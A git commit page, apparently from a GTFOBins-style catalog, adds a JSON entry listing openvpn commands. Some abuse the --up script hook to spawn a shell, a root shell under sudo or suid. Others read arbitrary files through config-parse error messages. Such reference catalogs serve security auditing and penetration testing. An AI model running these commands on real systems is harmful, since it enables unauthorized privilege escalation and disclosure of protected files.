add data source for openvpn

master
Mr. Robot 3 years ago committed by GitHub
parent e5f5053ceb
commit ce34e142a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -0,0 +1,28 @@
{
"functions": {
"file-read": [
{
"description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
"code": "openvpn --config \"[file]\"\n"
}
],
"suid": [
{
"code": "./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c \"sh -p\"'\n"
},
{
"description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
"code": "./openvpn --config \"[file]\"\n"
}
],
"sudo": [
{
"code": "sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'\n"
},
{
"description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
"code": "sudo openvpn --config \"[file]\"\n"
}
]
}
}
Loading…
Cancel
Save